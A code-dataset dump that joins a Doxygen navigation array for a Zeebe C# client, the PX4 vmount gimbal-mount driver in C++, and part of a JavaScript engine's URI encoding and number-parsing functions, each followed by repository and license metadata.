            [ "ICompleteJobResponse", "d3/d3e/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ICompleteJobResponse.html", null ],
            [ "IDeployResponse", "de/d05/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IDeployResponse.html", "de/d05/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IDeployResponse" ],
            [ "IFailJobResponse", "de/d8a/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IFailJobResponse.html", null ],
            [ "IJob", "dc/ddb/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IJob.html", "dc/ddb/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IJob" ],
            [ "IPartitionInfo", "d7/d34/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IPartitionInfo.html", "d7/d34/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IPartitionInfo" ],
            [ "IProcessInstanceResponse", "dd/d46/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResponse.html", "dd/d46/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResponse" ],
            [ "IProcessInstanceResult", "d0/dd0/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResult.html", "d0/dd0/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResult" ],
            [ "IProcessMetadata", "db/df6/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessMetadata.html", "db/df6/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessMetadata" ],
            [ "IPublishMessageResponse", "d0/dab/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IPublishMessageResponse.html", null ],
            [ "IResolveIncidentResponse", "de/df8/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IResolveIncidentResponse.html", null ],
            [ "ISetVariablesResponse", "d7/d1a/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ISetVariablesResponse.html", "d7/d1a/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ISetVariablesResponse" ],
            [ "IThrowErrorResponse", "d7/d26/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IThrowErrorResponse.html", null ],
            [ "ITopology", "df/d68/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ITopology.html", "df/d68/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ITopology" ],
            [ "IUpdateRetriesResponse", "d7/df3/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IUpdateRetriesResponse.html", null ]
          ] ],
          [ "Worker", "db/d2d/namespaceZeebe_1_1Client_1_1Api_1_1Worker.html", [
            [ "IJobClient", "df/d67/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobClient.html", "df/d67/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobClient" ],
            [ "IJobWorker", "d1/dfe/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorker.html", "d1/dfe/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorker" ],
            [ "IJobWorkerBuilderStep1", "d5/dc7/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep1.html", "d5/dc7/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep1" ],
            [ "IJobWorkerBuilderStep2", "d5/d42/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep2.html", "d5/d42/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep2" ],
            [ "IJobWorkerBuilderStep3", "d2/d59/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep3.html", "d2/d59/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep3" ]
          ] ]
        ] ],
        [ "IZeebeClient", "d7/dd6/interfaceZeebe_1_1Client_1_1IZeebeClient.html", "d7/dd6/interfaceZeebe_1_1Client_1_1IZeebeClient" ]
      ] ]
    ] ]
];
|
JavaScript
|
Apache-2.0
|
Christian-Oleson/zeebe-client-csharp/docs/annotated_dup.js
|
ca6e0b8c-9f14-405b-bf82-fdb45115d830
|
[]
|
[]
|
/****************************************************************************
*
* Copyright (c) 2013-2016 PX4 Development Team. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* 3. Neither the name PX4 nor the names of its contributors may be
* used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
****************************************************************************/
/**
* @file vmount.cpp
* @author Leon Müller (thedevleon)
* @author Beat Küng <beat-kueng@gmx.net>
* MAV_MOUNT driver for controlling mavlink gimbals, rc gimbals/servors and
* future kinds of mounts.
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <systemlib/err.h>
#include <px4_defines.h>
#include <px4_tasks.h>
#include "input_mavlink.h"
#include "input_rc.h"
#include "input_test.h"
#include "output_rc.h"
#include "output_mavlink.h"
#include <uORB/uORB.h>
#include <uORB/topics/parameter_update.h>
#include <px4_config.h>
using namespace vmount;

/* thread state */
// Shared between the command entry point (vmount_main) and the worker thread;
// volatile because both sides poll/modify these flags.
static volatile bool thread_should_exit = false;	// request worker shutdown
static volatile bool thread_running = false;		// true while the worker loop runs

/// Input/output driver objects owned by the worker thread.
struct ThreadData {
	InputBase *input_obj = nullptr;
	OutputBase *output_obj = nullptr;
};

// Published by the worker thread so the "status" command can inspect the
// current input/output objects; nullptr when the worker is not running.
static volatile ThreadData *g_thread_data = nullptr;
/**
 * Cached values of the MNT_* parameters; a fresh copy is compared against
 * the previous one (via operator!=) to detect configuration changes.
 */
struct Parameters {
	int mnt_mode_in;	// input mode selector (0 disables input initialization)
	int mnt_mode_out;	// output mode selector (0 = AUX/RC output, 1 = MAVLink)
	int mnt_mav_sysid;	// copied to OutputConfig::mavlink_sys_id
	int mnt_mav_compid;	// copied to OutputConfig::mavlink_comp_id
	int mnt_ob_lock_mode;	// copied to OutputConfig::gimbal_retracted_mode_value
	int mnt_ob_norm_mode;	// copied to OutputConfig::gimbal_normal_mode_value
	int mnt_man_control;	// non-zero enables manual (RC) input
	int mnt_man_pitch;	// passed to InputRC (channel mapping — TODO confirm semantics)
	int mnt_man_roll;	// passed to InputRC (channel mapping — TODO confirm semantics)
	int mnt_man_yaw;	// passed to InputRC (channel mapping — TODO confirm semantics)

	/// Field-wise inequality, used to detect parameter updates at runtime.
	bool operator!=(const Parameters &p)
	{
		return mnt_mode_in != p.mnt_mode_in ||
		       mnt_mode_out != p.mnt_mode_out ||
		       mnt_mav_sysid != p.mnt_mav_sysid ||
		       mnt_mav_compid != p.mnt_mav_compid ||
		       mnt_ob_lock_mode != p.mnt_ob_lock_mode ||
		       mnt_ob_norm_mode != p.mnt_ob_norm_mode ||
		       mnt_man_control != p.mnt_man_control ||
		       mnt_man_pitch != p.mnt_man_pitch ||
		       mnt_man_roll != p.mnt_man_roll ||
		       mnt_man_yaw != p.mnt_man_yaw;
	}
};
/// Parameter handles matching the fields of Parameters, resolved once via
/// param_find() in get_params() and reused for every subsequent param_get().
struct ParameterHandles {
	param_t mnt_mode_in;
	param_t mnt_mode_out;
	param_t mnt_mav_sysid;
	param_t mnt_mav_compid;
	param_t mnt_ob_lock_mode;
	param_t mnt_ob_norm_mode;
	param_t mnt_man_control;
	param_t mnt_man_pitch;
	param_t mnt_man_roll;
	param_t mnt_man_yaw;
};
/* functions */
static void usage(void);
static void update_params(ParameterHandles ¶m_handles, Parameters ¶ms, bool &got_changes);
static bool get_params(ParameterHandles ¶m_handles, Parameters ¶ms);
static int vmount_thread_main(int argc, char *argv[]);
extern "C" __EXPORT int vmount_main(int argc, char *argv[]);
/// Print command-line usage of the vmount driver to the console.
static void usage()
{
	PX4_INFO("usage: vmount {start|stop|status|test}");
	PX4_INFO("       vmount test {roll|pitch|yaw} <angle_deg>");
}
/**
 * Worker-thread entry point of the vmount driver.
 *
 * Creates the configured input and output objects (re-creating them whenever
 * the MNT_* parameters change), then loops: poll the input with a short
 * timeout, forward the resulting control data to the output, and publish.
 * When invoked as "vmount test <axis> <angle_deg>" a fixed-angle InputTest
 * object is used instead of the configured input and the thread exits once
 * the test input reports it has finished.
 *
 * @return 0 on clean shutdown, -1 on a usage or parameter error
 */
static int vmount_thread_main(int argc, char *argv[])
{
	ParameterHandles param_handles;
	Parameters params;
	OutputConfig output_config;
	ThreadData thread_data;
	memset(&params, 0, sizeof(params));
	InputTest *test_input = nullptr;
#ifdef __PX4_NUTTX
	/* the NuttX optarg handler does not
	 * ignore argv[0] like the POSIX handler
	 * does, nor does it deal with non-flag
	 * verbs well. So we Remove the application
	 * name and the verb.
	 */
	argc -= 1;
	argv += 1;
#endif
	if (argc > 0 && !strcmp(argv[0], "test")) {
		PX4_INFO("Starting in test mode");
		const char *axis_names[3] = {"roll", "pitch", "yaw"};
		float angles[3] = { 0.f, 0.f, 0.f };
		if (argc == 3) {
			bool found_axis = false;
			// Match the requested axis name and parse the angle for it.
			for (int i = 0 ; i < 3; ++i) {
				if (!strcmp(argv[1], axis_names[i])) {
					long angle_deg = strtol(argv[2], NULL, 0);
					angles[i] = (float)angle_deg;
					found_axis = true;
				}
			}
			if (!found_axis) {
				usage();
				return -1;
			}
			test_input = new InputTest(angles[0], angles[1], angles[2]);
			if (!test_input) {
				PX4_ERR("memory allocation failed");
				return -1;
			}
		} else {
			usage();
			return -1;
		}
	}
	if (!get_params(param_handles, params)) {
		PX4_ERR("could not get mount parameters!");
		return -1;
	}
	int parameter_update_sub = orb_subscribe(ORB_ID(parameter_update));
	thread_running = true;
	ControlData *control_data = nullptr;
	InputRC *manual_input = nullptr;
	g_thread_data = &thread_data;
	while (!thread_should_exit) {
		if (!thread_data.input_obj && (params.mnt_mode_in != 0 || test_input)) { //need to initialize
			output_config.gimbal_normal_mode_value = params.mnt_ob_norm_mode;
			output_config.gimbal_retracted_mode_value = params.mnt_ob_lock_mode;
			output_config.mavlink_sys_id = params.mnt_mav_sysid;
			output_config.mavlink_comp_id = params.mnt_mav_compid;
			if (test_input) {
				// Test mode overrides the configured input.
				thread_data.input_obj = test_input;
			} else {
				if (params.mnt_man_control) {
					manual_input = new InputRC(params.mnt_man_roll, params.mnt_man_pitch, params.mnt_man_yaw);
					if (!manual_input) {
						PX4_ERR("memory allocation failed");
						break;
					}
				}
				switch (params.mnt_mode_in) {
				case 1: //RC
					if (manual_input) {
						// Hand ownership of the RC input over to thread_data.
						thread_data.input_obj = manual_input;
						manual_input = nullptr;
					} else {
						thread_data.input_obj = new InputRC(params.mnt_man_roll, params.mnt_man_pitch, params.mnt_man_yaw);
					}
					break;
				case 2: //MAVLINK_ROI
					// The MAVLink inputs take the (possibly null) RC input as fallback.
					thread_data.input_obj = new InputMavlinkROI(manual_input);
					break;
				case 3: //MAVLINK_DO_MOUNT
					thread_data.input_obj = new InputMavlinkCmdMount(manual_input);
					break;
				default:
					PX4_ERR("invalid input mode %i", params.mnt_mode_in);
					break;
				}
			}
			switch (params.mnt_mode_out) {
			case 0: //AUX
				thread_data.output_obj = new OutputRC(output_config);
				break;
			case 1: //MAVLINK
				thread_data.output_obj = new OutputMavlink(output_config);
				break;
			default:
				PX4_ERR("invalid output mode %i", params.mnt_mode_out);
				break;
			}
			if (!thread_data.input_obj || !thread_data.output_obj) {
				PX4_ERR("memory allocation failed");
				thread_should_exit = true;
				break;
			}
			int ret = thread_data.output_obj->initialize();
			if (ret) {
				PX4_ERR("failed to initialize output mode (%i)", ret);
				thread_should_exit = true;
				break;
			}
		}
		if (thread_data.input_obj) {
			//get input: we cannot make the timeout too large, because the output needs to update
			//periodically for stabilization and angle updates.
			int ret = thread_data.input_obj->update(50, &control_data);
			if (ret) {
				PX4_ERR("failed to read input (%i)", ret);
				break;
			}
			//update output
			ret = thread_data.output_obj->update(control_data);
			if (ret) {
				PX4_ERR("failed to write output (%i)", ret);
				break;
			}
			thread_data.output_obj->publish();
		} else {
			//wait for parameter changes. We still need to wake up regularily to check for thread exit requests
			usleep(1e6);
		}
		if (test_input && test_input->finished()) {
			thread_should_exit = true;
			break;
		}
		//check for parameter changes
		bool updated;
		if (orb_check(parameter_update_sub, &updated) == 0 && updated) {
			parameter_update_s param_update;
			orb_copy(ORB_ID(parameter_update), parameter_update_sub, &param_update);
			update_params(param_handles, params, updated);
			if (updated) {
				//re-init objects: they are deleted here and re-created at the top of the loop
				if (thread_data.input_obj) {
					delete(thread_data.input_obj);
					thread_data.input_obj = nullptr;
				}
				if (thread_data.output_obj) {
					delete(thread_data.output_obj);
					thread_data.output_obj = nullptr;
				}
				if (manual_input) {
					delete(manual_input);
					manual_input = nullptr;
				}
			}
		}
	}
	// Shutdown: unpublish the status pointer, then release all owned objects.
	// Note: test_input is either owned by thread_data.input_obj or was never
	// assigned, so it is not deleted separately.
	g_thread_data = nullptr;
	orb_unsubscribe(parameter_update_sub);
	if (thread_data.input_obj) {
		delete(thread_data.input_obj);
		thread_data.input_obj = nullptr;
	}
	if (thread_data.output_obj) {
		delete(thread_data.output_obj);
		thread_data.output_obj = nullptr;
	}
	if (manual_input) {
		delete(manual_input);
		manual_input = nullptr;
	}
	thread_running = false;
	return 0;
}
/**
 * The main command function.
 * Processes the command line verbs "start", "test", "stop" and "status",
 * spawning or controlling the vmount worker thread accordingly.
 * @return 0 on success, -1 on error
 */
int vmount_main(int argc, char *argv[])
{
	if (argc < 2) {
		PX4_ERR("missing command");
		usage();
		return -1;
	}
	if (!strcmp(argv[1], "start") || !strcmp(argv[1], "test")) {
		/* this is not an error */
		if (thread_running) {
			PX4_WARN("mount driver already running");
			return 0;
		}
		thread_should_exit = false;
		int vmount_task = px4_task_spawn_cmd("vmount",
						     SCHED_DEFAULT,
						     SCHED_PRIORITY_DEFAULT + 40,
						     1500,
						     vmount_thread_main,
						     (char *const *)argv + 1);
		// Poll up to 100 * 5 ms (~500 ms) for the worker to report it is running.
		int counter = 0;
		while (!thread_running && vmount_task >= 0) {
			usleep(5000);
			if (++counter >= 100) {
				break;
			}
		}
		if (vmount_task < 0) {
			PX4_ERR("failed to start");
			return -1;
		}
		// Success if the worker came up in time, or if it already requested
		// exit (e.g. a short-lived "test" run that finished immediately).
		return counter < 100 || thread_should_exit ? 0 : -1;
	}
	if (!strcmp(argv[1], "stop")) {
		/* this is not an error */
		if (!thread_running) {
			PX4_WARN("mount driver not running");
			return 0;
		}
		// Request shutdown and block until the worker acknowledges.
		thread_should_exit = true;
		while (thread_running) {
			usleep(100000);
		}
		return 0;
	}
	if (!strcmp(argv[1], "status")) {
		if (thread_running && g_thread_data) {
			if (g_thread_data->input_obj) {
				g_thread_data->input_obj->print_status();
			} else {
				PX4_INFO("Input: None");
			}
			if (g_thread_data->output_obj) {
				g_thread_data->output_obj->print_status();
			} else {
				PX4_INFO("Output: None");
			}
		} else {
			PX4_INFO("not running");
		}
		return 0;
	}
	PX4_ERR("unrecognized command");
	usage();
	return -1;
}
void update_params(ParameterHandles ¶m_handles, Parameters ¶ms, bool &got_changes)
{
Parameters prev_params = params;
param_get(param_handles.mnt_mode_in, ¶ms.mnt_mode_in);
param_get(param_handles.mnt_mode_out, ¶ms.mnt_mode_out);
param_get(param_handles.mnt_mav_sysid, ¶ms.mnt_mav_sysid);
param_get(param_handles.mnt_mav_compid, ¶ms.mnt_mav_compid);
param_get(param_handles.mnt_ob_lock_mode, ¶ms.mnt_ob_lock_mode);
param_get(param_handles.mnt_ob_norm_mode, ¶ms.mnt_ob_norm_mode);
param_get(param_handles.mnt_man_control, ¶ms.mnt_man_control);
param_get(param_handles.mnt_man_pitch, ¶ms.mnt_man_pitch);
param_get(param_handles.mnt_man_roll, ¶ms.mnt_man_roll);
param_get(param_handles.mnt_man_yaw, ¶ms.mnt_man_yaw);
got_changes = prev_params != params;
}
bool get_params(ParameterHandles ¶m_handles, Parameters ¶ms)
{
param_handles.mnt_mode_in = param_find("MNT_MODE_IN");
param_handles.mnt_mode_out = param_find("MNT_MODE_OUT");
param_handles.mnt_mav_sysid = param_find("MNT_MAV_SYSID");
param_handles.mnt_mav_compid = param_find("MNT_MAV_COMPID");
param_handles.mnt_ob_lock_mode = param_find("MNT_OB_LOCK_MODE");
param_handles.mnt_ob_norm_mode = param_find("MNT_OB_NORM_MODE");
param_handles.mnt_man_control = param_find("MNT_MAN_CONTROL");
param_handles.mnt_man_pitch = param_find("MNT_MAN_PITCH");
param_handles.mnt_man_roll = param_find("MNT_MAN_ROLL");
param_handles.mnt_man_yaw = param_find("MNT_MAN_YAW");
if (param_handles.mnt_mode_in == PARAM_INVALID ||
param_handles.mnt_mode_out == PARAM_INVALID ||
param_handles.mnt_mav_sysid == PARAM_INVALID ||
param_handles.mnt_mav_compid == PARAM_INVALID ||
param_handles.mnt_ob_lock_mode == PARAM_INVALID ||
param_handles.mnt_ob_norm_mode == PARAM_INVALID ||
param_handles.mnt_man_control == PARAM_INVALID ||
param_handles.mnt_man_pitch == PARAM_INVALID ||
param_handles.mnt_man_roll == PARAM_INVALID ||
param_handles.mnt_man_yaw == PARAM_INVALID) {
return false;
}
bool dummy;
update_params(param_handles, params, dummy);
return true;
}
|
C++
|
BSD-3-Clause
|
mazahner/Firmware/src/drivers/vmount/vmount.cpp
|
47901599-8de3-4aa6-8835-9665fcc115f3
|
[{"tag": "EMAIL", "value": "beat-kueng@gmx.net", "start": 1820, "end": 1838, "context": "or Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for controlling mavlink gimb"}, {"tag": "USERNAME", "value": "thedevleon", "start": 1786, "end": 1796, "context": "\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV"}, {"tag": "NAME", "value": "Beat K\u00fcng", "start": 1809, "end": 1818, "context": "pp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for cont"}, {"tag": "NAME", "value": "Leon M\u00fcller", "start": 1773, "end": 1784, "context": "************/\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx"}]
|
[{"tag": "EMAIL", "value": "beat-kueng@gmx.net", "start": 1820, "end": 1838, "context": "or Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for controlling mavlink gimb"}, {"tag": "USERNAME", "value": "thedevleon", "start": 1786, "end": 1796, "context": "\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV"}, {"tag": "NAME", "value": "Beat K\u00fcng", "start": 1809, "end": 1818, "context": "pp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx.net>\n * MAV_MOUNT driver for cont"}, {"tag": "NAME", "value": "Leon M\u00fcller", "start": 1773, "end": 1784, "context": "************/\n\n/**\n * @file vmount.cpp\n * @author Leon M\u00fcller (thedevleon)\n * @author Beat K\u00fcng <beat-kueng@gmx"}]
|
/*
Copyright 2012 Aphid Mobile
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/*
* Copyright (C) 1999-2002 Harri Porten (porten@kde.org)
* Copyright (C) 2001 Peter Kelly (pmk@post.com)
* Copyright (C) 2003, 2004, 2005, 2006, 2007, 2008, 2009 Apple Inc. All rights reserved.
* Copyright (C) 2007 Cameron Zwarich (cwzwarich@uwaterloo.ca)
* Copyright (C) 2007 Maks Orlovich
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public License
* along with this library; see the file COPYING.LIB. If not, write to
* the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
* Boston, MA 02110-1301, USA.
*
*/
#include "config.h"
#include "AJGlobalObjectFunctions.h"
#include "CallFrame.h"
#include "GlobalEvalFunction.h"
#include "Interpreter.h"
#include "AJGlobalObject.h"
#include "AJString.h"
#include "AJStringBuilder.h"
#include "Lexer.h"
#include "LiteralParser.h"
#include "Nodes.h"
#include "Parser.h"
#include "StringBuilder.h"
#include "StringExtras.h"
#include "dtoa.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wtf/ASCIICType.h>
#include <wtf/Assertions.h>
#include <wtf/MathExtras.h>
#include <wtf/unicode/UTF8.h>
using namespace ATF;
using namespace Unicode;
namespace AJ {
// Percent-encodes every byte of the UTF-8 form of args[0] that is not listed
// in doNotEscape; throws a URIError when the argument is not valid UTF-16.
static AJValue encode(ExecState* exec, const ArgList& args, const char* doNotEscape)
{
    UString input = args.at(0).toString(exec);
    CString utf8 = input.UTF8String(true);
    if (!utf8.data())
        return throwError(exec, URIError, "String contained an illegal UTF-16 sequence.");

    AJStringBuilder result;
    const char* bytes = utf8.data();
    const size_t length = utf8.length();
    for (size_t i = 0; i < length; ++i) {
        const char byte = bytes[i];
        // A NUL byte is always escaped; other bytes pass through only when
        // doNotEscape lists them.
        if (byte && strchr(doNotEscape, byte)) {
            result.append(byte);
        } else {
            char escaped[4]; // "%XX" plus terminator
            snprintf(escaped, sizeof(escaped), "%%%02X", static_cast<unsigned char>(byte));
            result.append(escaped);
        }
    }
    return result.build(exec);
}
// Shared implementation of decodeURI / decodeURIComponent / unescape.
// Scans for %XX escapes, reassembles multi-byte UTF-8 sequences into UTF-16
// code units (emitting surrogate pairs for supplementary characters), and
// leaves any character listed in doNotUnescape in its encoded form.
// In non-strict mode (used only by unescape) malformed escapes pass through
// unchanged and the legacy "%uXXXX" form is honored.
static AJValue decode(ExecState* exec, const ArgList& args, const char* doNotUnescape, bool strict)
{
    AJStringBuilder builder;
    UString str = args.at(0).toString(exec);
    int k = 0;
    int len = str.size();
    const UChar* d = str.data();
    UChar u = 0;
    while (k < len) {
        const UChar* p = d + k;
        UChar c = *p;
        if (c == '%') {
            // charLen stays 0 until a complete, valid escape is recognized.
            int charLen = 0;
            if (k <= len - 3 && isASCIIHexDigit(p[1]) && isASCIIHexDigit(p[2])) {
                const char b0 = Lexer::convertHex(p[1], p[2]);
                // Length in bytes of the UTF-8 sequence introduced by b0 (0 if b0 is invalid).
                const int sequenceLen = UTF8SequenceLength(b0);
                if (sequenceLen != 0 && k <= len - sequenceLen * 3) {
                    charLen = sequenceLen * 3;
                    char sequence[5];
                    sequence[0] = b0;
                    // Each continuation byte must itself be a %XX escape.
                    for (int i = 1; i < sequenceLen; ++i) {
                        const UChar* q = p + i * 3;
                        if (q[0] == '%' && isASCIIHexDigit(q[1]) && isASCIIHexDigit(q[2]))
                            sequence[i] = Lexer::convertHex(q[1], q[2]);
                        else {
                            charLen = 0;
                            break;
                        }
                    }
                    if (charLen != 0) {
                        sequence[sequenceLen] = 0;
                        const int character = decodeUTF8Sequence(sequence);
                        if (character < 0 || character >= 0x110000)
                            charLen = 0; // outside Unicode range: treat as malformed
                        else if (character >= 0x10000) {
                            // Convert to surrogate pair.
                            builder.append(static_cast<UChar>(0xD800 | ((character - 0x10000) >> 10)));
                            u = static_cast<UChar>(0xDC00 | ((character - 0x10000) & 0x3FF));
                        } else
                            u = static_cast<UChar>(character);
                    }
                }
            }
            if (charLen == 0) {
                if (strict)
                    return throwError(exec, URIError);
                // The only case where we don't use "strict" mode is the "unescape" function.
                // For that, it's good to support the wonky "%u" syntax for compatibility with WinIE.
                if (k <= len - 6 && p[1] == 'u'
                    && isASCIIHexDigit(p[2]) && isASCIIHexDigit(p[3])
                    && isASCIIHexDigit(p[4]) && isASCIIHexDigit(p[5])) {
                    charLen = 6;
                    u = Lexer::convertUnicode(p[2], p[3], p[4], p[5]);
                }
            }
            // Emit the decoded unit unless it is an ASCII character the caller
            // wants to keep escaped (NUL and non-ASCII are never withheld).
            if (charLen && (u == 0 || u >= 128 || !strchr(doNotUnescape, u))) {
                c = u;
                k += charLen - 1;
            }
        }
        k++;
        builder.append(c);
    }
    return builder.build(exec);
}
bool isStrWhiteSpace(UChar c)
{
    // StrWhiteSpace per the spec: tab, LF, VT, FF, CR, space, no-break
    // space, line/paragraph separator, plus any Unicode space separator
    // with a code point above 0xFF.
    if (c == 0x0009 || c == 0x000A || c == 0x000B || c == 0x000C
        || c == 0x000D || c == 0x0020 || c == 0x00A0
        || c == 0x2028 || c == 0x2029)
        return true;
    return c > 0xff && isSeparatorSpace(c);
}
// Map an ASCII digit or letter onto its numeric value, or -1 when the
// character is not a valid digit under the given radix.
static int parseDigit(unsigned short c, int radix)
{
    int value;
    if ('0' <= c && c <= '9')
        value = c - '0';
    else if ('A' <= c && c <= 'Z')
        value = 10 + (c - 'A');
    else if ('a' <= c && c <= 'z')
        value = 10 + (c - 'a');
    else
        return -1;
    return value < radix ? value : -1;
}
// Slow path for parseInt when the accumulated value exceeds the double
// mantissa: accumulate from the least significant digit upward so the
// rounding behavior matches the specification. Callers are expected to pass
// only characters that are valid digits for `radix` (parseDigit's -1 result
// is not checked here).
double parseIntOverflow(const char* s, int length, int radix)
{
    double number = 0.0;
    double radixMultiplier = 1.0;
    for (const char* p = s + length - 1; p >= s; p--) {
        if (radixMultiplier == Inf) {
            // The place value has overflowed: any nonzero digit at or above
            // this position forces the result to Infinity.
            if (*p != '0') {
                number = Inf;
                break;
            }
        } else {
            int digit = parseDigit(*p, radix);
            number += digit * radixMultiplier;
        }
        radixMultiplier *= radix;
    }
    return number;
}
// parseInt per the spec: skip whitespace, read an optional sign, honor a
// "0x"/"0X" prefix (forcing radix 16) or a leading 0 (legacy octal) when the
// radix argument is 0, then accumulate digits until the first invalid
// character. Returns NaN for an unusable radix or when no digit was seen.
static double parseInt(const UString& s, int radix)
{
    int length = s.size();
    const UChar* data = s.data();
    int p = 0;
    while (p < length && isStrWhiteSpace(data[p]))
        ++p;
    double sign = 1;
    if (p < length) {
        if (data[p] == '+')
            ++p;
        else if (data[p] == '-') {
            sign = -1;
            ++p;
        }
    }
    if ((radix == 0 || radix == 16) && length - p >= 2 && data[p] == '0' && (data[p + 1] == 'x' || data[p + 1] == 'X')) {
        radix = 16;
        p += 2;
    } else if (radix == 0) {
        if (p < length && data[p] == '0')
            radix = 8; // legacy octal extension
        else
            radix = 10;
    }
    if (radix < 2 || radix > 36)
        return NaN;
    int firstDigitPosition = p;
    bool sawDigit = false;
    double number = 0;
    while (p < length) {
        int digit = parseDigit(data[p], radix);
        if (digit == -1)
            break;
        sawDigit = true;
        number *= radix;
        number += digit;
        ++p;
    }
    // The naive accumulation above loses precision past the double mantissa,
    // so large results are re-parsed exactly (strtod for base 10, digit-wise
    // reaccumulation for power-of-two radixes).
    if (number >= mantissaOverflowLowerBound) {
        // FIXME: It is incorrect to use UString::ascii() here because it's not thread-safe.
        if (radix == 10)
            number = ATF::strtod(s.substr(firstDigitPosition, p - firstDigitPosition).ascii(), 0);
        else if (radix == 2 || radix == 4 || radix == 8 || radix == 16 || radix == 32)
            number = parseIntOverflow(s.substr(firstDigitPosition, p - firstDigitPosition).ascii(), p - firstDigitPosition, radix);
    }
    if (!sawDigit)
        return NaN;
    return sign * number;
}
static double parseFloat(const UString& s)
{
// Check for 0x prefix here, because toDouble allows it, but we must treat it as 0.
// Need to skip any whitespace and then one + or - sign.
int length = s.size();
const UChar* data = s.data();
int p = 0;
while (p < length && isStrWhiteSpace(data[p]))
++p;
if (p < length && (data[p] == '+' || data[p] == '-'))
++p;
if (length - p >= 2 && data[p] == '0' && (data[p + 1] == 'x' || data[p + 1] == 'X'))
return 0;
// FIXME: UString::toDouble will ignore leading ASCII spaces, but we need to ignore
